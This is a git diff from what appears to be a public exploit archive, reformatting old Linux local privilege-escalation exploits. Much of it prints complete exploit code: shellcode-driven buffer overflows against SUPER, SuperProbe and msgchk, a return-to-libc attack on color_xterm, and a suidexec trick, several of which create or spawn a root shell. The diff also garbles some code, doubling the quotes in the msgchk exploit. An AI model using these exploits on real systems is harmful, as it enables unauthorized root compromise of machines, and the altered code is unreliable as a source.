a/platforms/linux/local/19077.c +++ b/platforms/linux/local/19077.c @@ -190,4 +190,4 @@ echo offset=$x x=$[x+50] ./dipr $x done -rm -f core \ No newline at end of file +rm -f core \ No newline at end of file diff --git a/platforms/linux/local/19078.c b/platforms/linux/local/19078.c old mode 100755 new mode 100644 diff --git a/platforms/linux/dos/19080.txt b/platforms/linux/local/19080.txt old mode 100755 new mode 100644 similarity index 83% rename from platforms/linux/dos/19080.txt rename to platforms/linux/local/19080.txt index 32f47bb9c..76c699428 --- a/platforms/linux/dos/19080.txt +++ b/platforms/linux/local/19080.txt @@ -4,7 +4,7 @@ source: http://www.securityfocus.com/bid/94/info as soon as just _one_ suid root shell script can be found on the system: Just invoke -/usr/bin/suidexec &lt;your program&gt; /path/to/script +/usr/bin/suidexec <your program> /path/to/script - it will happily execute your program with euid = 0. This is completely sufficient for doing arbitrary damage on the diff --git a/platforms/linux/local/19095.txt b/platforms/linux/local/19095.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/19106.c b/platforms/linux/local/19106.c old mode 100755 new mode 100644 index 23e13de58..fe9c2d437 --- a/platforms/linux/local/19106.c +++ b/platforms/linux/local/19106.c @@ -1,8 +1,9 @@ -source: http://www.securityfocus.com/bid/129/info +/* source: http://www.securityfocus.com/bid/129/info Rdist is a program to maintain identical copies of files over multiple hosts. It preserves the owner, group, mode, and mtime of files if possible and can update programs that are executing. Rdist reads commands from distfile to direct the updating of files and/or directories. Rdist has over time been notorious for security vulnerabilities. In this instance it is vulnerable to a buffer overrun from user supplied data. Given that rdist is setuid root in some enviroments the attacker can excecute this buffer overflow with the resulting commands they craft being executed as root. +*/ /* cut here Brian Mitchell (brian@saturn.net) */ #include <stdio.h> diff --git a/platforms/linux/local/19122.txt b/platforms/linux/local/19122.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/19125.txt b/platforms/linux/local/19125.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/19146.sh b/platforms/linux/local/19146.sh index 5ca912708..8c7cb2ff0 100755 --- a/platforms/linux/local/19146.sh +++ b/platforms/linux/local/19146.sh @@ -1,6 +1,6 @@ -source: http://www.securityfocus.com/bid/186/info - -A vulnerability exists within the DataLynx's suGuard program which allows a local attacker to gain administrative privilege by exploiting poor use of the /tmp directory and poor programming. +#source: http://www.securityfocus.com/bid/186/info +# +#A vulnerability exists within the DataLynx's suGuard program which allows a local attacker to gain administrative privilege by exploiting poor use of the /tmp directory and poor programming. #!/bin/sh # sgrun exploit - the types of vulnerabilities that this exploit exercises @@ -45,4 +45,4 @@ if [ -f ${SUSHI} ] ; then echo root shell created as ${SUSHI} ls -l ${SUSHI} echo -fi \ No newline at end of file +fi \ No newline at end of file diff --git a/platforms/linux/local/19240.c b/platforms/linux/local/19240.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/19243.txt b/platforms/linux/local/19243.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/19249.c b/platforms/linux/local/19249.c old mode 100755 new mode 100644 index 9d98dc517..15e368321 --- a/platforms/linux/local/19249.c +++ b/platforms/linux/local/19249.c @@ -1,9 +1,11 @@ +/* source: http://www.securityfocus.com/bid/311/info XCmail is an X11 mail client for linux. Arthur <pierric@ADMIN.LINUX.ORG> discovered an exploitable buffer overflow vulnerability in xcmail. The bug appears when replying to a message with a long subject line, and only when autoquote is on. The exploit is trivial, but as the buffer is not very large you have to do very precise return address calculation. It is believed it IS remotely exploitable, but you have to know a lot about the machine you want to gain acces to. +*/ /* 27/02/1999 exploit by XSFX@iname.com.... this bug is not exploitable in any harmful way, at least not easily :) @@ -53,4 +55,4 @@ fprintf(stderr, "sample exploit by XSFX@iname.com\n" "DEBUG: %d NOPs\n" "DEBUG: fwrite(&esp,4,1,stdout); putc('\n',stdout); -printf("Message-Id: <199812021827.TAA23112@003.dyn.ml.org>\n"); printf("To: \"dear user\" <you@domain.com>\n"); printf("\n"); printf("hello ! please reply, i'm not sure my email box is ok :(\n"); printf("\n"); } \ No newline at end of file +printf("Message-Id: <199812021827.TAA23112@003.dyn.ml.org>\n"); printf("To: \"dear user\" <you@domain.com>\n"); printf("\n"); printf("hello ! please reply, i'm not sure my email box is ok :(\n"); printf("\n"); } \ No newline at end of file diff --git a/platforms/linux/local/19254.c b/platforms/linux/local/19254.c old mode 100755 new mode 100644 index aa381e87b..17036693a --- a/platforms/linux/local/19254.c +++ b/platforms/linux/local/19254.c @@ -212,4 +212,4 @@ if (task[i]) testtask ((unsigned int)(task[i])); -} \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/linux/local/19255.txt b/platforms/linux/local/19255.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/19256.c b/platforms/linux/local/19256.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/19257.c b/platforms/linux/local/19257.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/19259.c b/platforms/linux/local/19259.c old mode 100755 new mode 100644 index 126dcccf6..a0163e164 --- a/platforms/linux/local/19259.c +++ b/platforms/linux/local/19259.c @@ -123,4 +123,4 @@ putenv(buff); system("`which lpc` attach lp $RET; `which lpc` status lp"); -} \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/linux/local/19270.c b/platforms/linux/local/19270.c old mode 100755 new mode 100644 index a98a95835..d38398a85 --- a/platforms/linux/local/19270.c +++ b/platforms/linux/local/19270.c @@ -1,126 +1,66 @@ -source: http://www.securityfocus.com/bid/342/info - - -After the first super buffer overflow vulnerability was discovered, another appeared shortly after. This vulnerability exists when the syslog option is enabled. The overflow is in the file error.c, in the Error() function where the buf[MAXPRINT] buffer is used with no bounds checking. The consequences of this are local root compromise. - ---------------- SDI-super.c -------------------------------------- - +// source: http://www.securityfocus.com/bid/342/info +// +// After the first super buffer overflow vulnerability was discovered, another appeared shortly after. This vulnerability exists when the syslog option is enabled. The overflow is in the file error.c, in the Error() function where the buf[MAXPRINT] buffer is used with no bounds checking. The consequences of this are local root compromise. +// +// --------------- SDI-super.c -------------------------------------- +// /* - * [ Sekure SDI ] - * [ Brazilian Info Security Team ] - * | ---------------------------------- ] - * | SUPER exploit for linux | - * | ---------------------------------- | - * | | - * | http://ssc.sekure.org | - * | Sekure SDI Secure Coding Team | - * | | - * | ---------------------------------- | - * | by c0nd0r <condor@sekure.org> | - * | ---------------------------------- | - * [ thanks for the ppl at sekure.org: ] - * [ jamez(shellcode), bishop, dumped, ] - * [ bahamas, fcon, vader, yuckfoo. ] - * - * - * This will exploit a buffer overflow condition in the log section of - * the SUPER program. - * - * It will create a suid bash owned by root at /tmp/sh. - * (It'll defeat the debian bash-2.xx protection against rootshell) - * - * Note: The SUPER program must be compiled with the SYSLOG option. - * - * also thanks people from #uground (irc.brasnet.org network) - * - */ - char shellcode[] = - "\xeb\x31\x5e\x89\x76\x32\x8d\x5e\x08\x89\x5e\x36" - "\x8d\x5e\x0b\x89\x5e\x3a\x31\xc0\x88\x46\x07\x88" - "\x46\x0a\x88\x46\x31\x89\x46\x3e\xb0\x0b\x89\xf3" - "\x8d\x4e\x32\x8d\x56\x3e\xcd\x80\x31\xdb\x89\xd8" - "\x40\xcd\x80\xe8\xca\xff\xff\xff" - "/bin/sh -c cp /bin/sh /tmp/sh; chmod 4755 /tmp/sh"; - unsigned long getsp ( void) { - __asm__("mov %esp,%eax"); - } - main ( int argc, char *argv[] ) { - char itamar[2040]; // ta mar mesmo - long addr; - int x, y, offset = 1000, align=0; - if ( argc > 1) offset = atoi(argv[1]); - addr = getsp() + offset; - for ( x = 0; x < (1410-strlen(shellcode)); x++) - itamar[x] = 0x90; - for ( ; y < strlen(shellcode); x++, y++) - itamar[x] = shellcode[y]; - for ( ; x < 1500; x+=4) { - itamar[x ] = (addr & 0xff000000) >> 24; - itamar[x+1] = (addr & 0x000000ff); - itamar[x+2] = (addr & 0x0000ff00) >> 8; - itamar[x+3] = (addr & 0x00ff0000) >> 16; - } - itamar[x++] = '\0'; - printf ( "\nwargames at 0x%x, offset %d\n", addr, offset); - printf ( "Look for a suid shell root owned at /tmp/sh\n"); - execl ( "/usr/local/bin/super", "super", "-T",itamar, (char *) 0); - -} \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/linux/local/19279.sh b/platforms/linux/local/19279.sh index 4137d2aa0..d169d8505 100755 --- a/platforms/linux/local/19279.sh +++ b/platforms/linux/local/19279.sh @@ -72,4 +72,4 @@ else echo ---------------- This machine does not appear to be vulnerable. -fi \ No newline at end of file +fi \ No newline at end of file diff --git a/platforms/linux/local/19281.c b/platforms/linux/local/19281.c old mode 100755 new mode 100644 index eb519fea5..1cfa84300 --- a/platforms/linux/local/19281.c +++ b/platforms/linux/local/19281.c @@ -105,4 +105,4 @@ setenv("HOME", buff, 1); system("/usr/bin/X11/xosview -display 0:0"); /* your IP here */ -} \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/linux/local/19283.c b/platforms/linux/local/19283.c old mode 100755 new mode 100644 index af02a26dc..88320375f --- a/platforms/linux/local/19283.c +++ b/platforms/linux/local/19283.c @@ -1,69 +1,38 @@ +/* source: http://www.securityfocus.com/bid/364/info - superprobe is an program supplied with XFree86 that helps determine video hardware. It is shipped with Slackware Linux 3.1 and is installed setuid root. There is an exploitable strcpy buffer overflow in the TestChip() function which allows for a trivial local root compromise. +*/ - - /* - - * SuperProbe buffer overflow exploit for Linux, tested on Slackware 3.1 - - * Copyright (c) 1997 by Solar Designer - - */ - - #include <stdio.h> - - #include <stdlib.h> - - #include <unistd.h> - - char *shellcode = - - "\x31\xc0\xb0\x31\xcd\x80\x93\x31\xc0\xb0\x17\xcd\x80\x68\x59\x58\xff\xe1" - - "\xff\xd4\x31\xc0\x8d\x51\x04\x89\xcf\x89\x02\xb0\x2e\x40\xfc\xae\x75\xfd" - - "\x89\x39\x89\xfb\x40\xae\x75\xfd\x88\x67\xff\xb0\x0b\xcd\x80\x31\xc0\x40" - - "\x31\xdb\xcd\x80/" - - "/bin/sh" - - "0"; - - char *get_sp() { - - asm("movl %esp,%eax"); - - } - - #define bufsize 8192 - - #define alignment 0 - - char buffer[bufsize]; - - main() { - - int i; - - for (i = 0; i < bufsize / 2; i += 4) - - *(char **)&buffer[i] = get_sp() - 2048; - - memset(&buffer[bufsize / 2], 0x90, bufsize / 2); - - strcpy(&buffer[bufsize - 256], shellcode); - - setenv("SHELLCODE", buffer, 1); - - memset(buffer, 'x', 72); - - *(char **)&buffer[72] = get_sp() - 6144 - alignment; - - buffer[76] = 0; - - execl("/usr/X11/bin/SuperProbe", "SuperProbe", "-nopr", buffer, NULL); - - } \ No newline at end of file +/* +* SuperProbe buffer overflow exploit for Linux, tested on Slackware 3.1 +* Copyright (c) 1997 by Solar Designer +*/ +#include <stdio.h> +#include <stdlib.h> +#include <unistd.h> +char *shellcode = +"\x31\xc0\xb0\x31\xcd\x80\x93\x31\xc0\xb0\x17\xcd\x80\x68\x59\x58\xff\xe1" +"\xff\xd4\x31\xc0\x8d\x51\x04\x89\xcf\x89\x02\xb0\x2e\x40\xfc\xae\x75\xfd" +"\x89\x39\x89\xfb\x40\xae\x75\xfd\x88\x67\xff\xb0\x0b\xcd\x80\x31\xc0\x40" +"\x31\xdb\xcd\x80/" +"/bin/sh" +"0"; +char *get_sp() { +asm("movl %esp,%eax"); +} +#define bufsize 8192 +#define alignment 0 +char buffer[bufsize]; +main() { +int i; +for (i = 0; i < bufsize / 2; i += 4) +*(char **)&buffer[i] = get_sp() - 2048; +memset(&buffer[bufsize / 2], 0x90, bufsize / 2); +strcpy(&buffer[bufsize - 256], shellcode); +setenv("SHELLCODE", buffer, 1); +memset(buffer, 'x', 72); +*(char **)&buffer[72] = get_sp() - 6144 - alignment; +buffer[76] = 0; +execl("/usr/X11/bin/SuperProbe", "SuperProbe", "-nopr", buffer, NULL); +} \ No newline at end of file diff --git a/platforms/linux/local/19284.c b/platforms/linux/local/19284.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/19285.txt b/platforms/linux/local/19285.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/19286.c b/platforms/linux/local/19286.c old mode 100755 new mode 100644 index d17b0d605..38c9dd496 --- a/platforms/linux/local/19286.c +++ b/platforms/linux/local/19286.c @@ -1,177 +1,179 @@ +/* source: http://www.securityfocus.com/bid/369/info In Slackware Linux 3.1 and 3.2, the version of color xterm included is vulnerable to a buffer overflow attack that allows for a local user to gain root access. +*/ /* - * color_xterm buffer overflow exploit for Linux with - * non-executable stack - * Copyright (c) 1997 by Solar Designer - * - * Compile: - * gcc cx.c -o cx -L/usr/X11/lib \ - * `ldd /usr/X11/bin/color_xterm | sed -e s/^.lib/-l/ -e s/\\\.so.\\\+//` - * - * Run: - * $ ./cx - * system() found at: 401553b0 - * "/bin/sh" found at: 401bfa3d - * bash# exit - * Segmentation fault - */ + * color_xterm buffer overflow exploit for Linux with + * non-executable stack + * Copyright (c) 1997 by Solar Designer + * + * Compile: + * gcc cx.c -o cx -L/usr/X11/lib \ + * `ldd /usr/X11/bin/color_xterm | sed -e s/^.lib/-l/ -e s/\\\.so.\\\+//` + * + * Run: + * $ ./cx + * system() found at: 401553b0 + * "/bin/sh" found at: 401bfa3d + * bash# exit + * Segmentation fault + */ - #include <stdio.h> - #include <unistd.h> - #include <string.h> - #include <stdlib.h> - #include <signal.h> - #include <setjmp.h> - #include <sys/ptrace.h> - #include <sys/types.h> - #include <sys/wait.h> +#include <stdio.h> +#include <unistd.h> +#include <string.h> +#include <stdlib.h> +#include <signal.h> +#include <setjmp.h> +#include <sys/ptrace.h> +#include <sys/types.h> +#include <sys/wait.h> - #define SIZE1 1200 /* Amount of data to overflow with */ - #define ALIGNMENT1 0 /* 0..3 */ - #define OFFSET 22000 /* Structure array offset */ - #define SIZE2 16000 /* Structure array size */ - #define ALIGNMENT2 5 /* 0, 4, 1..3, 5..7 */ - #define SIZE3 SIZE2 - #define ALIGNMENT3 (ALIGNMENT2 & 3) +#define SIZE1 1200 /* Amount of data to overflow with */ +#define ALIGNMENT1 0 /* 0..3 */ +#define OFFSET 22000 /* Structure array offset */ +#define SIZE2 16000 /* Structure array size */ +#define ALIGNMENT2 5 /* 0, 4, 1..3, 5..7 */ +#define SIZE3 SIZE2 +#define ALIGNMENT3 (ALIGNMENT2 & 3) - #define ADDR_MASK 0xFF000000 +#define ADDR_MASK 0xFF000000 - char buf1[SIZE1], buf2[SIZE2 + SIZE3], *buf3 = &buf2[SIZE2]; - int *ptr; +char buf1[SIZE1], buf2[SIZE2 + SIZE3], *buf3 = &buf2[SIZE2]; +int *ptr; - int pid, pc, shell, step; - int started = 0; - jmp_buf env; +int pid, pc, shell, step; +int started = 0; +jmp_buf env; - void handler() { - started++; - } +void handler() { + started++; +} - /* SIGSEGV handler, to search in libc */ - void fault() { - if (step < 0) { - /* Change the search direction */ - longjmp(env, 1); - } else { - /* The search failed in both directions */ - puts("\"/bin/sh\" not found, bad luck"); - exit(1); - } - } +/* SIGSEGV handler, to search in libc */ +void fault() { + if (step < 0) { +/* Change the search direction */ + longjmp(env, 1); + } else { +/* The search failed in both directions */ + puts("\"/bin/sh\" not found, bad luck"); + exit(1); + } +} - void error(char *fn) { - perror(fn); - if (pid > 0) kill(pid, SIGKILL); - exit(1); - } +void error(char *fn) { + perror(fn); + if (pid > 0) kill(pid, SIGKILL); + exit(1); +} - int nz(int value) { - if (!(value & 0xFF)) value |= 8; - if (!(value & 0xFF00)) value |= 0x100; +int nz(int value) { + if (!(value & 0xFF)) value |= 8; + if (!(value & 0xFF00)) value |= 0x100; - return value; - } + return value; +} - void main() { - /* - * A portable way to get the stack pointer value; why do other exploits use - * an assembly instruction here?! - */ - int sp = (int)&sp; +void main() { +/* + * A portable way to get the stack pointer value; why do other exploits use + * an assembly instruction here?! + */ + int sp = (int)&sp; - signal(SIGUSR1, handler); + signal(SIGUSR1, handler); - /* Create a child process to trace */ - if ((pid = fork()) < 0) error("fork"); +/* Create a child process to trace */ + if ((pid = fork()) < 0) error("fork"); - if (!pid) { - /* Send the parent a signal, so it starts tracing */ - kill(getppid(), SIGUSR1); - /* A loop since the parent may not start tracing immediately */ - while (1) system(""); - } + if (!pid) { +/* Send the parent a signal, so it starts tracing */ + kill(getppid(), SIGUSR1); +/* A loop since the parent may not start tracing immediately */ + while (1) system(""); + } - /* Wait until the child tells us the next library call will be system() */ - while (!started); +/* Wait until the child tells us the next library call will be system() */ + while (!started); - if (ptrace(PTRACE_ATTACH, pid, 0, 0)) error("PTRACE_ATTACH"); + if (ptrace(PTRACE_ATTACH, pid, 0, 0)) error("PTRACE_ATTACH"); - /* Single step the child until it gets out of system() */ - do { - waitpid(pid, NULL, WUNTRACED); - pc = ptrace(PTRACE_PEEKUSR, pid, 4*EIP, 0); - if (pc == -1) error("PTRACE_PEEKUSR"); - if (ptrace(PTRACE_SINGLESTEP, pid, 0, 0)) error("PTRACE_SINGLESTEP"); - } while ((pc & ADDR_MASK) != ((int)main & ADDR_MASK)); +/* Single step the child until it gets out of system() */ + do { + waitpid(pid, NULL, WUNTRACED); + pc = ptrace(PTRACE_PEEKUSR, pid, 4*EIP, 0); + if (pc == -1) error("PTRACE_PEEKUSR"); + if (ptrace(PTRACE_SINGLESTEP, pid, 0, 0)) error("PTRACE_SINGLESTEP"); + } while ((pc & ADDR_MASK) != ((int)main & ADDR_MASK)); - /* Single step the child until it calls system() again */ - do { - waitpid(pid, NULL, WUNTRACED); - pc = ptrace(PTRACE_PEEKUSR, pid, 4*EIP, 0); - if (pc == -1) error("PTRACE_PEEKUSR"); - if (ptrace(PTRACE_SINGLESTEP, pid, 0, 0)) error("PTRACE_SINGLESTEP"); - } while ((pc & ADDR_MASK) == ((int)main & ADDR_MASK)); +/* Single step the child until it calls system() again */ + do { + waitpid(pid, NULL, WUNTRACED); + pc = ptrace(PTRACE_PEEKUSR, pid, 4*EIP, 0); + if (pc == -1) error("PTRACE_PEEKUSR"); + if (ptrace(PTRACE_SINGLESTEP, pid, 0, 0)) error("PTRACE_SINGLESTEP"); + } while ((pc & ADDR_MASK) == ((int)main & ADDR_MASK)); - /* Kill the child, we don't need it any more */ - if (ptrace(PTRACE_KILL, pid, 0, 0)) error("PTRACE_KILL"); - pid = 0; +/* Kill the child, we don't need it any more */ + if (ptrace(PTRACE_KILL, pid, 0, 0)) error("PTRACE_KILL"); + pid = 0; - printf("system() found at: %08x\n", pc); + printf("system() found at: %08x\n", pc); - /* Let's hope there's an extra NOP if system() is 256 byte aligned */ - if (!(pc & 0xFF)) - if (*(unsigned char *)--pc != 0x90) pc = 0; +/* Let's hope there's an extra NOP if system() is 256 byte aligned */ + if (!(pc & 0xFF)) + if (*(unsigned char *)--pc != 0x90) pc = 0; - /* There's no easy workaround for these (except for using another function) */ - if (!(pc & 0xFF00) || !(pc & 0xFF0000) || !(pc & 0xFF000000)) { - puts("Zero bytes in address, bad luck"); - exit(1); - } +/* There's no easy workaround for these (except for using another function) */ + if (!(pc & 0xFF00) || !(pc & 0xFF0000) || !(pc & 0xFF000000)) { + puts("Zero bytes in address, bad luck"); + exit(1); + } - /* - * Search for a "/bin/sh" in libc until we find a copy with no zero bytes - * in its address. To avoid specifying the actual address that libc is - * mmap()ed to we search from the address of system() in both directions - * until a SIGSEGV is generated. - */ - if (setjmp(env)) step = 1; else step = -1; - shell = pc; - signal(SIGSEGV, fault); - do - while (memcmp((void *)shell, "/bin/sh", 8)) shell += step; - while (!(shell & 0xFF) || !(shell & 0xFF00) || !(shell & 0xFF0000)); - signal(SIGSEGV, SIG_DFL); +/* + * Search for a "/bin/sh" in libc until we find a copy with no zero bytes + * in its address. To avoid specifying the actual address that libc is + * mmap()ed to we search from the address of system() in both directions + * until a SIGSEGV is generated. + */ + if (setjmp(env)) step = 1; else step = -1; + shell = pc; + signal(SIGSEGV, fault); + do + while (memcmp((void *)shell, "/bin/sh", 8)) shell += step; + while (!(shell & 0xFF) || !(shell & 0xFF00) || !(shell & 0xFF0000)); + signal(SIGSEGV, SIG_DFL); - printf("\"/bin/sh\" found at: %08x\n", shell); + printf("\"/bin/sh\" found at: %08x\n", shell); - /* buf1 (which we overflow with) is filled with pointers to buf2 */ - memset(buf1, 'x', ALIGNMENT1); - ptr = (int *)(buf1 + ALIGNMENT1); - while ((char *)ptr < buf1 + SIZE1 - sizeof(int)) - *ptr++ = nz(sp - OFFSET); /* db */ - buf1[SIZE1 - 1] = 0; +/* buf1 (which we overflow with) is filled with pointers to buf2 */ + memset(buf1, 'x', ALIGNMENT1); + ptr = (int *)(buf1 + ALIGNMENT1); + while ((char *)ptr < buf1 + SIZE1 - sizeof(int)) + *ptr++ = nz(sp - OFFSET); /* db */ + buf1[SIZE1 - 1] = 0; - /* buf2 is filled with pointers to "/bin/sh" and to buf3 */ - memset(buf2, 'x', SIZE2 + SIZE3); - ptr = (int *)(buf2 + ALIGNMENT2); - while ((char *)ptr < buf2 + SIZE2) { - *ptr++ = shell; /* db->mbstate */ - *ptr++ = nz(sp - OFFSET + SIZE2); /* db->methods */ - } +/* buf2 is filled with pointers to "/bin/sh" and to buf3 */ + memset(buf2, 'x', SIZE2 + SIZE3); + ptr = (int *)(buf2 + ALIGNMENT2); + while ((char *)ptr < buf2 + SIZE2) { + *ptr++ = shell; /* db->mbstate */ + *ptr++ = nz(sp - OFFSET + SIZE2); /* db->methods */ + } - /* buf3 is filled with pointers to system() */ - ptr = (int *)(buf3 + ALIGNMENT3); - while ((char *)ptr < buf3 + SIZE3 - sizeof(int)) - *ptr++ = pc; /* db->methods->mbfinish */ - buf3[SIZE3 - 1] = 0; +/* buf3 is filled with pointers to system() */ + ptr = (int *)(buf3 + ALIGNMENT3); + while ((char *)ptr < buf3 + SIZE3 - sizeof(int)) + *ptr++ = pc; /* db->methods->mbfinish */ + buf3[SIZE3 - 1] = 0; - /* Put buf2 and buf3 on the stack */ - setenv("BUFFER", buf2, 1); +/* Put buf2 and buf3 on the stack */ + setenv("BUFFER", buf2, 1); - /* GetDatabase() in libX11 will do (*db->methods->mbfinish)(db->mbstate) */ - execl("/usr/X11/bin/color_xterm", "color_xterm", "-xrm", buf1, NULL); - error("execl"); - } \ No newline at end of file +/* GetDatabase() in libX11 will do (*db->methods->mbfinish)(db->mbstate) */ + execl("/usr/X11/bin/color_xterm", "color_xterm", "-xrm", buf1, NULL); + error("execl"); +} \ No newline at end of file diff --git a/platforms/linux/local/19302.c b/platforms/linux/local/19302.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/19305.c b/platforms/linux/local/19305.c old mode 100755 new mode 100644 index edd1ae5be..8df8f82f6 --- a/platforms/linux/local/19305.c +++ b/platforms/linux/local/19305.c @@ -1,7 +1,7 @@ -source: http://www.securityfocus.com/bid/383/info - -Similar to the mh vulnerability, a buffer overflow exists in the version of msgchk shipped with RedHat Linux 5.0. The vulnerability allows a user to execute arbritrary commands as root to compromise superuser access. - +// source: http://www.securityfocus.com/bid/383/info +// +// Similar to the mh vulnerability, a buffer overflow exists in the version of msgchk shipped with RedHat Linux 5.0. The vulnerability allows a user to execute arbritrary commands as root to compromise superuser access. +// #include <stdlib.h> #define DEFAULT_OFFSET 0 @@ -9,19 +9,19 @@ Similar to the mh vulnerability, a buffer overflow exists in the version of msgc #define NOP 0x90 char shellcode[] = -"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" +""\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"" -"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" - "\x80\xe8\xdc\xff\xff\xff/bin/sh"; +""\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"" + ""\x80\xe8\xdc\xff\xff\xff/bin/sh""; unsigned long get_sp(void) { - __asm__("movl %esp,%eax"); + __asm__(""movl %esp,%eax""); } void main(int argc, char *argv[]) { char *buff, *ptr; char *args[5]; -char jorge[]=""; +char jorge[]=""""; long *addr_ptr, addr; int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE; int i; @@ -29,12 +29,12 @@ char jorge[]=""; if (argc > 2) offset = atoi(argv[2]); if (!(buff = malloc(bsize))) { - printf("Can't allocate memory.\n"); + printf(""Can't allocate memory.\n""); exit(0); } addr = get_sp() - offset; - printf("Using address: 0x%x\n", addr); + printf(""Using address: 0x%x\n"", addr); ptr = buff; addr_ptr = (long *) ptr; @@ -56,8 +56,8 @@ char jorge[]=""; buff[bsize - 1] = '\0'; - args[0]="/usr/bin/mh/msgchk"; - args[1]="-host"; + args[0]=""/usr/bin/mh/msgchk""; + args[1]=""-host""; args[2]=buff; args[3]=NULL; execve(args[0],args,NULL); diff --git a/platforms/linux/local/19311.c b/platforms/linux/local/19311.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/19312.c b/platforms/linux/local/19312.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/19314.c b/platforms/linux/local/19314.c old mode 100755 new mode 100644 index 803154dca..4796e35f3 --- a/platforms/linux/local/19314.c +++ b/platforms/linux/local/19314.c @@ -24,4 +24,4 @@ return 0; } Klogd Exploit Using Envcheck by Esa Etelavuori <eetelavu@cc.hut.fi> -Release Date: 20000925 \ No newline at end of file +Release Date: 20000925 \ No newline at end of file diff --git a/platforms/linux/local/19315.c b/platforms/linux/local/19315.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/19360.c b/platforms/linux/local/19360.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/19370.c b/platforms/linux/local/19370.c old mode 100755 new mode 100644 index d1403e6c7..ccb849e4d --- a/platforms/linux/local/19370.c +++ b/platforms/linux/local/19370.c @@ -80,4 +80,4 @@ execl ( "/usr/X11R6/bin/Xaccel", "Xaccel", buf, (char *)0); // system ( "/bin/sh"); } ------ EOF ---------- \ No newline at end of file +----- EOF ---------- \ No newline at end of file diff --git a/platforms/linux/local/19371.c b/platforms/linux/local/19371.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/19373.c b/platforms/linux/local/19373.c old mode 100755 new mode 100644 index 4b05021be..36ea2e1e5 --- a/platforms/linux/local/19373.c +++ b/platforms/linux/local/19373.c @@ -1,6 +1,7 @@ -source: http://www.securityfocus.com/bid/496/info - -Lsof is an open file management utility included with many linux distributions. When run setuid root or setgid kmem, it is subject to a buffer overflow that can lead to regular users gaining root priveleges. +// source: http://www.securityfocus.com/bid/496/info +// +// Lsof is an open file management utility included with many linux distributions. When run setuid root or setgid kmem, it is subject to a buffer overflow that can lead to regular users gaining root priveleges. +// /* * Sekure SDI (Brazilian Information Security Team) diff --git a/platforms/linux/local/19374.c b/platforms/linux/local/19374.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/19384.c b/platforms/linux/local/19384.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/19419.c b/platforms/linux/local/19419.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/19422.txt b/platforms/linux/local/19422.txt old mode 100755 new mode 100644 index 4d40c3384..aeb60e5e5 --- a/platforms/linux/local/19422.txt +++ b/platforms/linux/local/19422.txt @@ -23,4 +23,4 @@ maheaa@jedi:/opt/patrol/PATROL3.2/HPUX-PA1.1-V10/bin> ls -al /.rhosts note: If the file exists, it keeps the same perms and overwrites it with "i^A" then the result of gethostname() and some whitespace. this problem is not platform dependent and was tested based on out of box -install on an HP. \ No newline at end of file +install on an HP. \ No newline at end of file diff --git a/platforms/linux/local/19428.c b/platforms/linux/local/19428.c old mode 100755 new mode 100644 index 0f98b697e..b6d2338c5 --- a/platforms/linux/local/19428.c +++ b/platforms/linux/local/19428.c @@ -1,6 +1,8 @@ +/* source: http://www.securityfocus.com/bid/536/info There were a number of vulnerabilities in the Samba package pre-2.0.5. The first is a possible denial of service in nmbd (the netbios name service daemon), which resulted in nmbd spinning until killed. The second vulnerability known is a possible buffer overflow problem in smbd which is not exploit in the default install/configuration. A function in the messaging system could be exploited and arbitrary code executed as root if the "message command" was set in smb.conf. There was also a race condition vulnerability which could possible allow an attacker to mount arbitrary points in the filesystem if smbmnt was setuid root (which it is not by default). +*/ /* The default parameters to the program diff --git a/platforms/linux/local/19464.c b/platforms/linux/local/19464.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/19465.c b/platforms/linux/local/19465.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/19467.c b/platforms/linux/local/19467.c old mode 100755 new mode 100644 index 77e904664..0dbce1b7b --- a/platforms/linux/local/19467.c +++ b/platforms/linux/local/19467.c @@ -23,4 +23,4 @@ exit(1); sleep(1); for (i;i<strlen(c);i++) ioctl(x,0x5412,&c[i]); -} \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/linux/local/19469.c b/platforms/linux/local/19469.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/19470.c b/platforms/linux/local/19470.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/19474.txt b/platforms/linux/local/19474.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/19485.c b/platforms/linux/local/19485.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/19499.c b/platforms/linux/local/19499.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/19500.c b/platforms/linux/local/19500.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/19501.c b/platforms/linux/local/19501.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/19511.c b/platforms/linux/local/19511.c old mode 100755 new mode 100644 diff --git a/platforms/linux/local/19523.txt b/platforms/linux/local/19523.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/local/19544.c b/platforms/linux/local/19544.c old mode 100755 new mode 100644 diff --git 